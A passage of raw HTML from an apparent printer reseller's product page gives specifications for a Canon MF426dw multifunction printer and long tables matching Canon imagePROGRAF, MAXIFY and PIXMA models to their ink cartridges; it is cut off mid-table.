srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p>\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 38ppm</li>\n 	<li>Recommended monthly print volume: 750 - 4,000 pages</li>\n 	<li>FPOT: 5.5secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 900 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h3>Cartridge Printers :-</h3>		\n		<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>imagePROGRAF PRO-500</p></td><td width=\"208\"><p>Maintenance Cartridge MC-20</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY iB4170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5070</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5370</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5470</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA E3170</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E410</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td 